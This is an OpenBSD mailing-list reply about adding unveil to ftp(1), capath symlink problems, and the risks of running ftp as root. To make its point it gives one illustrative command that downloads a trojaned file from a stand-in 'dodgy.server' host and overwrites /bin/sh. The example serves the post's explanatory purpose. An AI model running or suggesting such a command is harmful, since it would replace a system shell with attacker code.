On 2020-05-30, Luke Small <lukensmall@gmail.com> wrote:
> I'll get to looking at ftp(1) more when I get some physical contact with my
> server. I'm quaranteaming with my girlfriend's folks.
>
> I have a pkg_ping program (OpenBSD-specific, dns caching, latency-timed,
> architecture and version specific mirror search; which doesn't download
> from OpenBSD.org/ftp.html anymore) that calls ftp to look up a random
> mirror's ftplist.
OK so (ignoring that I don't think pkg_ping is a good idea at all because
it increases the chances of getting packages out-of-sync with the base OS)
what you should do is call it with ftp -o - $URL and read on stdin.
That uses the best protection available in ftp now and I think that is
as good as you're reasonably going to get.
> I mentioned initially:
>
> It could take 3 lines at line 389 in /usr/src/usr.bin/ftp/main.c:
> if (strcmp(outfile, "-"))
> if (unveil(outfile, "cw") == -1)
> err(1, "unveil");
>
> but it could look at several of the options like the cookie and certificate
> paths and such.
We went through this earlier when unveil was added to nc. The way capath
directories are often populated in the real world is not compatible with
unveil, you would need to resolve all files in capath, recursively resolve
symlinks, and add the chain of symlinks to the list of files to unveil.
Or remove capath support, or don't bother with unveil.
> I'd love to make it as safe to run as root as it is running it as an
> unprivileged chrooted user! And I love C!
It *cannot* be as safe to run as root as it is running it as an unprivileged
chrooted user. ftp -o /bin/sh http://dodgy.server/trojanned-sh
No comments:
Post a Comment